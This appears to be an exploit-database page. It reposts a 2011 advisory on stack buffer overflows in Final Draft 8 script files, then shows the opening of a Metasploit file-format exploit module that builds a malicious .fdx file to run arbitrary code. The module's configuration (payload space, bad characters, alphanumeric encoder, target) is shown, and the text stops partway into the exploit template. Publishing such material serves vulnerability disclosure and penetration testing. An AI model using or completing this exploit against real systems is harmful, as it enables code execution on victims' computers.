[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Final Draft 8 Multiple Stack Buffer Overflows
# Published : 2011-12-01
# Author :
# Previous Title : SkinCrafter ActiveX Control version 3.0 Buffer Overflow
# Next Title : PHP 5.4 (5.4.3) Code Execution (Win32)
#Name : Final Draft 8 Multiple Stack Buffer Overflows
#Vendor Website : http://www.finaldraft.com/index.php
#Date Released : 29/11/2011
#Affected Software : Final Draft < 8.02
#Researcher : Nick Freeman (nick.freeman@security-assessment.com)
#Description
#Security-Assessment.com has discovered several file format vulnerabilities in .fdx and .fdxt files, as used by #the script writing software, Final Draft 8.
#The following XML tag elements were found to be vulnerable to buffer overflows, which can be exploited to #execute arbitrary code under the context of the user running Final Draft 8:
#<Word> in <IgnoredWords>
# <Transition> in <SmartType>
# <Location> in <SmartType>
# <Extension> in <SmartType>
# <SceneIntro> in <SmartType>
# <TimeOfDay> in <SmartType>
# <Character> in <SmartType>
#By crafting a file that contains more than 10,032 characters in one of the above fields, the Final Draft 8 #application will crash as a result of a buffer overflow overwriting the SEH (Structured Exception Handler).
#Solution
#The latest version of Final Draft (version 8.02) remediates this vulnerability. This can be downloaded from #the Final Draft website.
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Final Draft 8 File Format Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in Final Draft 8. Multiple
fields are vulnerable to the overflow, however <Word> in <IgnoredWords> is
the only field to accept mixed-case characters.
},
'License' => MSF_LICENSE,
'Author' => [ 'vt [nick.freeman@security-assessment.com]' ],
'Version' => '$Revision: 10394 $',
'References' =>
[
[ 'URL', 'http://security-assessment.com/files/documents/advisory/Final_Draft-Multiple_Stack_Buffer_Overflows.pdf' ]
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "x00",
'DisableNops' => true,
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'EAX',
}
},
'Platform' => 'win',
'Targets' =>
[
[ 'Default',
{
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Nov 29 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'evil.fdx']),
], self.class)
end
def exploit
template = %Q|<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<FinalDraft DocumentType="Script" Template="No" Version="1">
<Content>
<Paragraph Type="Show/Ep. Title">
<Text>a